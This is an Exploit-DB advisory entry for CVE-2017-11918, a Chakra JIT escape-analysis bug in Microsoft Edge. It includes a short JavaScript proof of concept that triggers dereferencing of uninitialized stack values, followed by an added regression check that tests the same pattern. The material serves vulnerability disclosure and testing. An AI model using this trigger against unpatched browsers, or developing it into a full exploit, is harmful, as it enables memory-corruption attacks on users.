Microsoft Edge Chakra JIT - Escape Analysis Bug

EDB-ID: 43469
Author: Google Security Research
Published: 2018-01-09
CVE: CVE-2017-11918
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

Escape analysis:

Chakra fails to detect that "tmp" escapes its scope and therefore allocates it on the stack. This may lead to dereferencing uninitialized stack values.


function opt() {
    let tmp = [];
    tmp[0] = tmp;      // tmp is stored into its own element, so it escapes via the return value
    return tmp[0];
}

function main() {
    for (let i = 0; i < 0x1000; i++) {
        print(opt()); // deref uninitialized stack pointers!
    }
}

main();
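The following is an added regression check, not part of the Exploit-DB entry or the original bug report: it exercises the same self-referential "tmp" pattern many times (enough for a JIT to tier up) and verifies that the engine keeps returning a real, heap-backed array whose first element is itself, which is what correct escape handling requires. The function names `checkEscapeSemantics` and `cycleLength` are assumed names chosen for this example.

```javascript
// Added example (not the advisory's own code). The pattern below is the one
// from the entry above: storing "tmp" into its own element and returning that
// element means the array escapes opt(), so it must not be stack-allocated.
function opt() {
  let tmp = [];
  tmp[0] = tmp;      // self-reference: tmp escapes through its own element
  return tmp[0];     // the returned value is tmp itself
}

// Calls opt() `iterations` times and checks that every result is an array
// whose first element is the array itself. Any other result (a non-array,
// a dangling value, an exception) counts as a failure.
function checkEscapeSemantics(iterations) {
  let ok = 0;
  for (let i = 0; i < iterations; i++) {
    let r;
    try {
      r = opt();
    } catch (e) {
      continue;      // an exception means the engine mishandled the escape
    }
    if (Array.isArray(r) && r.length === 1 && r[0] === r) {
      ok++;
    }
  }
  return { iterations, ok, passed: ok === iterations };
}

// Walks r -> r[0] -> r[0][0] ... with a visited set so the cycle terminates;
// for a correctly built result the cycle is exactly one object long.
function cycleLength(r) {
  const seen = new Set();
  let cur = r;
  while (cur !== undefined && !seen.has(cur)) {
    seen.add(cur);
    cur = cur[0];
  }
  return seen.size;
}

console.log(checkEscapeSemantics(0x1000));
```

On an unaffected engine the report shows `passed: true` for all 0x1000 iterations; a result that is not self-referential after JIT warm-up is the symptom the entry describes.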

